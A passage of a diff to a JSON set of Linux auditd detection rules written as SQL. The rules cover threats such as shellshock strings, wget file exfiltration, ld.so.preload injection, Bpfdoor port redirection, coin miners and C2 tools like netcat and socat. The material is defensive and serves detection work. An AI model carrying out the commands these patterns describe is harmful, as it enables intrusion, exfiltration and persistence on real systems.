"7fcc54cb-f27d-4684-84b7-436af096f858", - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "title": "Program Executions in Suspicious Folders", + "id": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", + "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" + "attack.t1587", + "attack.t1584", + "attack.resource_development" ], "falsepositives": [ - "Unlikely" + "Admin activity (especially in /tmp folders)", + "Crazy web applications" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (USER LIKE '#-%' ESCAPE '\\' OR USER LIKE '#%4294967295' ESCAPE '\\')" + "SELECT * FROM logs WHERE (type = 'SYSCALL' AND (exe LIKE '/tmp/%' ESCAPE '\\' OR exe LIKE '/var/www/%' ESCAPE '\\' OR exe LIKE '/home/%/public\\_html/%' ESCAPE '\\' OR exe LIKE '/usr/local/apache2/%' ESCAPE '\\' OR exe LIKE '/usr/local/httpd/%' ESCAPE '\\' OR exe LIKE '/var/apache/%' ESCAPE '\\' OR exe LIKE '/srv/www/%' ESCAPE '\\' OR exe LIKE '/home/httpd/html/%' ESCAPE '\\' OR exe LIKE '/srv/http/%' ESCAPE '\\' OR exe LIKE '/usr/share/nginx/html/%' ESCAPE '\\' OR exe LIKE '/var/lib/pgsql/data/%' ESCAPE '\\' OR exe LIKE '/usr/local/mysql/data/%' ESCAPE '\\' OR exe LIKE '/var/lib/mysql/%' ESCAPE '\\' OR exe LIKE '/var/vsftpd/%' ESCAPE '\\' OR exe LIKE '/etc/bind/%' ESCAPE '\\' OR exe LIKE '/var/named/%' ESCAPE '\\'))" ], - "filename": "lnx_sudo_cve_2019_14287_user.yml" + "filename": "lnx_auditd_susp_exe_folders.yml" }, { - "title": "Shellshock Expression", - "id": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", - "description": "Detects shellshock expressions in log files", - "author": "Florian Roth (Nextron Systems)", + "title": "Steganography Unzip Hidden Information From Picture File", + "id": "edd595d7-7895-4fa7-acb3-85a18a8772ca", + "description": "Detects extracting of zip file from image file", + "author": "Pawel Mazur", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1027.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (logs MATCH ('\"(){:;};\" OR \"() {:;};\" OR \"() { :;};\" OR \"() { :; };\"'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'unzip' AND (a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.png' ESCAPE '\\'))" ], - "filename": "lnx_shellshock.yml" + "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml" }, { - "title": "Symlink Etc Passwd", - "id": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", - "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", - "author": "Florian Roth (Nextron Systems)", + "title": "File or Folder Permissions Change", + "id": "74c01ace-0152-4094-8ae2-6fd776dd43e5", + "description": "Detects file and folder permission changes.", + "author": "Jakob Weinzettl, oscd.community", "tags": [ - "attack.t1204.001", - "attack.execution" + "attack.defense_evasion", + "attack.t1222.002" ], "falsepositives": [ - "Unknown" + "User interacting with files permissions (normal/daily behaviour)." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (logs MATCH ('\"ln -s -f /etc/passwd\" OR \"ln -s /etc/passwd\"'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND (a0 LIKE '%chmod%' ESCAPE '\\' OR a0 LIKE '%chown%' ESCAPE '\\'))" ], - "filename": "lnx_symlink_etc_passwd.yml" + "filename": "lnx_auditd_file_or_folder_permissions.yml" }, { - "title": "Code Injection by ld.so Preload", - "id": "7e3c4651-c347-40c4-b1d4-d48590fdf684", - "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", - "author": "Christian Burkard (Nextron Systems)", + "title": "Systemd Service Reload or Start", + "id": "2625cc59-0634-40d0-821e-cb67382a3dd7", + "description": "Detects a reload or a start of a service.", + "author": "Jakob Weinzettl, oscd.community", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.006" + "attack.t1543.002" ], "falsepositives": [ - "Rare temporary workaround for library misconfiguration" + "Installation of legitimate service.", + "Legitimate reconfiguration of service." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE logs MATCH ('\"/etc/ld.so.preload\"')" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%systemctl%' ESCAPE '\\' AND (a1 LIKE '%daemon-reload%' ESCAPE '\\' OR a1 LIKE '%start%' ESCAPE '\\'))" ], - "filename": "lnx_ldso_preload_injection.yml" + "filename": "lnx_auditd_pers_systemd_reload.yml" }, { - "title": "Nimbuspwn Exploitation", - "id": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", - "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", - "author": "Bhabesh Raj", + "title": "Screen Capture with Xwd", + "id": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", + "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", + "author": "Pawel Mazur", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Unknown" + "Legitimate use of screenshot utility" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ( = 'networkd-dispatcher' AND = 'Error handling notification for interface' AND = '../../')" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'xwd') AND ((a1 = '-root' AND a2 = '-out' AND a3 LIKE '%.xwd' ESCAPE '\\') OR (a1 = '-out' AND a2 LIKE '%.xwd' ESCAPE '\\')))" ], - "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml" + "filename": "lnx_auditd_screencaputre_xwd.yml" }, { - "title": "Webshell Remote Command Execution", - "id": "c0d3734d-330f-4a03-aae2-65dacc6a8222", - "description": "Detects possible command execution by web application/web shell", - "author": "Ilyas Ochkov, Beyu Denis, oscd.community", + "title": "Disable System Firewall", + "id": "53059bc0-1472-438b-956a-7508a94a91f0", + "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", + "author": "Pawel Mazur", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.t1562.004", + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity", - "Crazy web applications" + "Admin activity" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'SYSCALL' AND syscall = 'execve' AND key LIKE 'detect\\_execve\\_www' ESCAPE '\\')" + "SELECT * FROM logs WHERE (type LIKE 'SERVICE\\_STOP' ESCAPE '\\' AND unit IN ('firewalld', 'iptables', 'ufw'))" ], - "filename": "lnx_auditd_web_rce.yml" + "filename": "lnx_auditd_disable_system_firewall.yml" }, { - "title": "Network Sniffing - Linux", - "id": "f4d3748a-65d1-4806-bd23-e25728081d01", - "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "author": "Timur Zinniatullin, oscd.community", + "title": "Audio Capture", + "id": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", + "description": "Detects attempts to record audio with arecord utility", + "author": "Pawel Mazur", "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Legitimate administrator or user uses network sniffing tool for legitimate reasons." + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((type = 'execve' AND a0 = 'tcpdump' AND a1 = '-c' AND a3 LIKE '%-i%' ESCAPE '\\') OR (type = 'execve' AND a0 = 'tshark' AND a1 = '-c' AND a3 = '-i'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'arecord' AND a1 = '-vv' AND a2 = '-fdat')" ], - "filename": "lnx_auditd_network_sniffing.yml" + "filename": "lnx_auditd_audio_capture.yml" }, { - "title": "Overwriting the File with Dev Zero or Null", - "id": "37222991-11e9-4b6d-8bdf-60fbe48f753e", - "description": "Detects overwriting (effectively wiping/deleting) of a file.", - "author": "Jakob Weinzettl, oscd.community", + "title": "Screen Capture with Import Tool", + "id": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", + "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", + "author": "Pawel Mazur", "tags": [ - "attack.impact", - "attack.t1485" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Appending null bytes to files.", - "Legitimate overwrite of files." + "Legitimate use of screenshot utility" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%dd%' ESCAPE '\\' AND (a1 LIKE '%if=/dev/null%' ESCAPE '\\' OR a1 LIKE '%if=/dev/zero%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'import') AND ((a1 = '-window' AND a2 = 'root' AND (a3 LIKE '%.png' ESCAPE '\\' OR a3 LIKE '%.jpg' ESCAPE '\\' OR a3 LIKE '%.jpeg' ESCAPE '\\')) OR (a1 LIKE '%.png' ESCAPE '\\' OR a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.jpeg' ESCAPE '\\')))" ], - "filename": "lnx_auditd_dd_delete_file.yml" + "filename": "lnx_auditd_screencapture_import.yml" }, { "title": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd", @@ -317,239 +334,240 @@ "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" }, { - "title": "Masquerading as Linux Crond Process", - "id": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", - "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", - "author": "Timur Zinniatullin, oscd.community", + "title": "Logging Configuration Changes on Linux Host", + "id": "c830f15d-6f6e-430f-8074-6f73d6807841", + "description": "Detect changes of syslog daemons configuration files", + "author": "Mikhail Larin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.006" ], - "level": "medium", + "falsepositives": [ + "Legitimate administrative activity" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'execve' AND a0 = 'cp' AND a1 = '-i' AND a2 = '/bin/sh' AND a3 LIKE '%/crond' ESCAPE '\\')" + "SELECT * FROM logs WHERE (type = 'PATH' AND name IN ('/etc/syslog.conf', '/etc/rsyslog.conf', '/etc/syslog-ng/syslog-ng.conf'))" ], - "filename": "lnx_auditd_masquerading_crond.yml" + "filename": "lnx_auditd_logging_config_change.yml" }, { - "title": "Linux Capabilities Discovery", - "id": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", - "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", - "author": "Pawel Mazur", + "title": "Bpfdoor TCP Ports Redirect", + "id": "70b4156e-50fc-4523-aa50-c9dddf1993fc", + "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", + "author": "Rafal Piasecki", "tags": [ - "attack.collection", - "attack.privilege_escalation", - "attack.t1123", - "attack.t1548" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Unknown" + "Legitimate ports redirect" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'getcap' AND a1 = '-r' AND a2 = '/')" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 LIKE '%iptables' ESCAPE '\\' AND a1 = '-t' AND a2 = 'nat') AND (logs MATCH ('\"--to-ports 42\" OR \"--to-ports 43\"')))" ], - "filename": "lnx_auditd_capabilities_discovery.yml" + "filename": "lnx_auditd_bpfdoor_port_redirect.yml" }, { - "title": "File or Folder Permissions Change", - "id": "74c01ace-0152-4094-8ae2-6fd776dd43e5", - "description": "Detects file and folder permission changes.", - "author": "Jakob Weinzettl, oscd.community", + "title": "Systemd Service Creation", + "id": "1bac86ba-41aa-4f62-9d6b-405eac99b485", + "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", + "author": "Pawel Mazur", "tags": [ - "attack.defense_evasion", - "attack.t1222.002" + "attack.persistence", + "attack.t1543.002" ], "falsepositives": [ - "User interacting with files permissions (normal/daily behaviour)." + "Admin work like legit service installs." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND (a0 LIKE '%chmod%' ESCAPE '\\' OR a0 LIKE '%chown%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((type = 'PATH' AND nametype = 'CREATE') AND ((name LIKE '/usr/lib/systemd/system/%' ESCAPE '\\' OR name LIKE '/etc/systemd/system/%' ESCAPE '\\') OR name LIKE '%/.config/systemd/user/%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_file_or_folder_permissions.yml" + "filename": "lnx_auditd_systemd_service_creation.yml" }, { - "title": "Hidden Files and Directories", - "id": "d08722cd-3d09-449a-80b4-83ea2d9d4616", - "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", - "author": "Pawel Mazur", + "title": "Remove Immutable File Attribute - Auditd", + "id": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", + "description": "Detects removing immutable file attribute.", + "author": "Jakob Weinzettl, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1222.002" ], "falsepositives": [ - "Unknown" + "Administrator interacting with immutable files (e.g. for instance backups)." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 IN ('mkdir', 'touch', 'vim', 'nano', 'vi')) AND (a1 LIKE '%/.%' ESCAPE '\\' OR a1 LIKE '.%' ESCAPE '\\' OR a2 LIKE '%/.%' ESCAPE '\\' OR a2 LIKE '.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%chattr%' ESCAPE '\\' AND a1 LIKE '%-i%' ESCAPE '\\')" ], - "filename": "lnx_auditd_hidden_files_directories.yml" + "filename": "lnx_auditd_chattr_immutable_removal.yml" }, { - "title": "Systemd Service Reload or Start", - "id": "2625cc59-0634-40d0-821e-cb67382a3dd7", - "description": "Detects a reload or a start of a service.", - "author": "Jakob Weinzettl, oscd.community", + "title": "Clipboard Collection with Xclip Tool - Auditd", + "id": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "author": "Pawel Mazur", "tags": [ - "attack.persistence", - "attack.t1543.002" + "attack.collection", + "attack.t1115" ], "falsepositives": [ - "Installation of legitimate service.", - "Legitimate reconfiguration of service." + "Legitimate usage of xclip tools" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%systemctl%' ESCAPE '\\' AND (a1 LIKE '%daemon-reload%' ESCAPE '\\' OR a1 LIKE '%start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'xclip' AND a1 IN ('-selection', '-sel') AND a2 IN ('clipboard', 'clip') AND a3 = '-o')" ], - "filename": "lnx_auditd_pers_systemd_reload.yml" + "filename": "lnx_auditd_clipboard_collection.yml" }, { - "title": "Logging Configuration Changes on Linux Host", - "id": "c830f15d-6f6e-430f-8074-6f73d6807841", - "description": "Detect changes of syslog daemons configuration files", - "author": "Mikhail Larin, oscd.community", + "title": "Modification of ld.so.preload", + "id": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", + "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.006" + "attack.t1574.006" ], "falsepositives": [ - "Legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND name IN ('/etc/syslog.conf', '/etc/rsyslog.conf', '/etc/syslog-ng/syslog-ng.conf'))" + "SELECT * FROM logs WHERE (type = 'PATH' AND name = '/etc/ld.so.preload')" ], - "filename": "lnx_auditd_logging_config_change.yml" + "filename": "lnx_auditd_ld_so_preload_mod.yml" }, { - "title": "Remove Immutable File Attribute - Auditd", - "id": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", - "description": "Detects removing immutable file attribute.", - "author": "Jakob Weinzettl, oscd.community", + "title": "Split A File Into Pieces - Linux", + "id": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "author": "Igor Fits, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1222.002" + "attack.exfiltration", + "attack.t1030" ], "falsepositives": [ - "Administrator interacting with immutable files (e.g. for instance backups)." + "Legitimate administrative activity" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 LIKE '%chattr%' ESCAPE '\\' AND a1 LIKE '%-i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (type = 'SYSCALL' AND comm = 'split')" ], - "filename": "lnx_auditd_chattr_immutable_removal.yml" + "filename": "lnx_auditd_split_file_into_pieces.yml" }, { - "title": "Audio Capture", - "id": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", - "description": "Detects attempts to record audio with arecord utility", + "title": "Data Exfiltration with Wget", + "id": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", + "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", "author": "Pawel Mazur", "tags": [ - "attack.collection", - "attack.t1123" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Unknown" + "Legitimate usage of wget utility to post a file" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'arecord' AND a1 = '-vv' AND a2 = '-fdat')" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'wget' AND a1 LIKE '--post-file=%' ESCAPE '\\')" ], - "filename": "lnx_auditd_audio_capture.yml" + "filename": "lnx_auditd_data_exfil_wget.yml" }, { - "title": "Use Of Hidden Paths Or Files", - "id": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e", - "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.", - "author": "David Burkett, @signalblur", + "title": "Linux Capabilities Discovery", + "id": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", + "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", + "author": "Pawel Mazur", "tags": [ - "attack.defense_evasion", - "attack.t1574.001" + "attack.collection", + "attack.privilege_escalation", + "attack.t1123", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((type = 'PATH' AND name LIKE '%/.%' ESCAPE '\\') AND NOT ((name LIKE '%/.cache/%' ESCAPE '\\' OR name LIKE '%/.config/%' ESCAPE '\\' OR name LIKE '%/.pyenv/%' ESCAPE '\\' OR name LIKE '%/.rustup/toolchains%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'getcap' AND a1 = '-r' AND a2 = '/')" ], - "filename": "lnx_auditd_hidden_binary_execution.yml" + "filename": "lnx_auditd_capabilities_discovery.yml" }, { - "title": "Steganography Unzip Hidden Information From Picture File", - "id": "edd595d7-7895-4fa7-acb3-85a18a8772ca", - "description": "Detects extracting of zip file from image file", + "title": "Clipboard Collection of Image Data with Xclip Tool", + "id": "f200dc3f-b219-425d-a17e-c38467364816", + "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", "author": "Pawel Mazur", "tags": [ - "attack.defense_evasion", - "attack.t1027.003" + "attack.collection", + "attack.t1115" ], "falsepositives": [ - "Unknown" + "Legitimate usage of xclip tools" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'unzip' AND (a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.png' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'xclip' AND a1 IN ('-selection', '-sel') AND a2 IN ('clipboard', 'clip') AND a3 = '-t' AND a4 LIKE 'image/%' ESCAPE '\\' AND a5 = '-o')" ], - "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml" + "filename": "lnx_auditd_clipboard_image_collection.yml" }, { - "title": "CVE-2021-3156 Exploitation Attempt", - "id": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", - "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", - "author": "Bhabesh Raj", + "title": "Loading of Kernel Module via Insmod", + "id": "106d7cbd-80ff-4985-b682-a7043e5acb72", + "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", + "author": "Pawel Mazur", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1068", - "cve.2021.3156" + "attack.t1547.006" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM (SELECT *,count(*) AS agg FROM logs WHERE ((type = 'EXECVE' AND a0 = '/usr/bin/sudoedit') AND (a1 = '-s' OR a2 = '-s' OR a3 = '-s' OR a4 = '-s') AND (a1 LIKE '\\\\' ESCAPE '\\' OR a2 LIKE '\\\\' ESCAPE '\\' OR a3 LIKE '\\\\' ESCAPE '\\' OR a4 LIKE '\\\\' ESCAPE '\\')) GROUP BY host) WHERE agg > 50" + "SELECT * FROM logs WHERE (type = 'SYSCALL' AND comm = 'insmod' AND exe = '/usr/bin/kmod')" ], - "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" + "filename": "lnx_auditd_load_module_insmod.yml" }, { - "title": "Steganography Hide Zip Information in Picture File", - "id": "45810b50-7edc-42ca-813b-bdac02fb946b", - "description": "Detects appending of zip file to image", - "author": "Pawel Mazur", + "title": "Suspicious C2 Activities", + "id": "f7158a64-6204-4d6d-868a-6e6378b467e0", + "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", + "author": "Marie Euler", "tags": [ - "attack.defense_evasion", - "attack.t1027.003" + "attack.command_and_control" ], "falsepositives": [ - "Unknown" + "Admin or User activity" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'cat' AND (a1 LIKE '%.jpg' ESCAPE '\\' OR a1 LIKE '%.png' ESCAPE '\\') AND a2 LIKE '%.zip' ESCAPE '\\')" + "SELECT * FROM logs WHERE key LIKE 'susp\\_activity' ESCAPE '\\'" ], - "filename": "lnx_auditd_hidden_zip_files_steganography.yml" + "filename": "lnx_auditd_susp_c2_commands.yml" }, { - "title": "Suspicious Commands Linux", - "id": "1543ae20-cbdf-4ec1-8d12-7664d667a825", - "description": "Detects relevant commands often related to malware or hacking activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Hidden Files and Directories", + "id": "d08722cd-3d09-449a-80b4-83ea2d9d4616", + "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", + "author": "Pawel Mazur", "tags": [ - "attack.execution", - "attack.t1059.004" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Admin activity" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'chmod' AND a1 = '777') OR (type = 'EXECVE' AND a0 = 'chmod' AND a1 = 'u+s') OR (type = 'EXECVE' AND a0 = 'cp' AND a1 = '/bin/ksh') OR (type = 'EXECVE' AND a0 = 'cp' AND a1 = '/bin/sh'))" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 IN ('mkdir', 'touch', 'vim', 'nano', 'vi')) AND (a1 LIKE '%/.%' ESCAPE '\\' OR a1 LIKE '.%' ESCAPE '\\' OR a2 LIKE '%/.%' ESCAPE '\\' OR a2 LIKE '.%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_susp_cmds.yml" + "filename": "lnx_auditd_hidden_files_directories.yml" }, { "title": "System Owner or User Discovery", @@ -570,78 +588,77 @@ "filename": "lnx_auditd_user_discovery.yml" }, { - "title": "Linux Keylogging with Pam.d", - "id": "49aae26c-450e-448b-911d-b3c13d178dfc", - "description": "Detect attempt to enable auditing of TTY input", - "author": "Pawel Mazur", + "title": "Network Sniffing - Linux", + "id": "f4d3748a-65d1-4806-bd23-e25728081d01", + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.credential_access", - "attack.t1003", - "attack.t1056.001" + "attack.discovery", + "attack.t1040" ], "falsepositives": [ - "Administrative work" + "Legitimate administrator or user uses network sniffing tool for legitimate reasons." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/pam.d/system-auth', '/etc/pam.d/password-auth')) OR (type LIKE 'TTY' ESCAPE '\\' OR type LIKE 'USER\\_TTY' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((type = 'execve' AND a0 = 'tcpdump' AND a1 = '-c' AND a3 LIKE '%-i%' ESCAPE '\\') OR (type = 'execve' AND a0 = 'tshark' AND a1 = '-c' AND a3 = '-i'))" ], - "filename": "lnx_auditd_keylogging_with_pam_d.yml" + "filename": "lnx_auditd_network_sniffing.yml" }, { - "title": "System Information Discovery - Auditd", - "id": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", - "description": "Detects System Information Discovery commands", - "author": "Pawel Mazur", + "title": "Possible Coin Miner CPU Priority Param", + "id": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", + "description": "Detects command line parameter very often used with coin miners", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Likely" + "Other tools that use a --cpu-priority flag" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/lsb-release', '/etc/redhat-release', '/etc/issue')) OR (type = 'EXECVE' AND a0 IN ('uname', 'uptime', 'lsmod', 'hostname', 'env')) OR (type = 'EXECVE' AND a0 = 'grep' AND (a1 LIKE '%vbox%' ESCAPE '\\' OR a1 LIKE '%vm%' ESCAPE '\\' OR a1 LIKE '%xen%' ESCAPE '\\' OR a1 LIKE '%virtio%' ESCAPE '\\' OR a1 LIKE '%hv%' ESCAPE '\\')) OR (type = 'EXECVE' AND a0 = 'kmod' AND a1 = 'list'))" + "SELECT * FROM logs WHERE (a1 LIKE '--cpu-priority%' ESCAPE '\\' OR a2 LIKE '--cpu-priority%' ESCAPE '\\' OR a3 LIKE '--cpu-priority%' ESCAPE '\\' OR a4 LIKE '--cpu-priority%' ESCAPE '\\' OR a5 LIKE '--cpu-priority%' ESCAPE '\\' OR a6 LIKE '--cpu-priority%' ESCAPE '\\' OR a7 LIKE '--cpu-priority%' ESCAPE '\\')" ], - "filename": "lnx_auditd_system_info_discovery.yml" + "filename": "lnx_auditd_coinminer.yml" }, { - "title": "Loading of Kernel Module via Insmod", - "id": "106d7cbd-80ff-4985-b682-a7043e5acb72", - "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", - "author": "Pawel Mazur", + "title": "Modify System Firewall", + "id": "323ff3f5-0013-4847-bbd4-250b5edb62cc", + "description": "Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.\nDetection rules that match only on the disabling of firewalls will miss this.\n", + "author": "IAI", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.006" + "attack.t1562.004", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type = 'SYSCALL' AND comm = 'insmod' AND exe = '/usr/bin/kmod')" + "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'iptables' AND a1 LIKE '%DROP%' ESCAPE '\\') OR (type = 'EXECVE' AND a0 = 'firewall-cmd' AND a1 LIKE '%remove%' 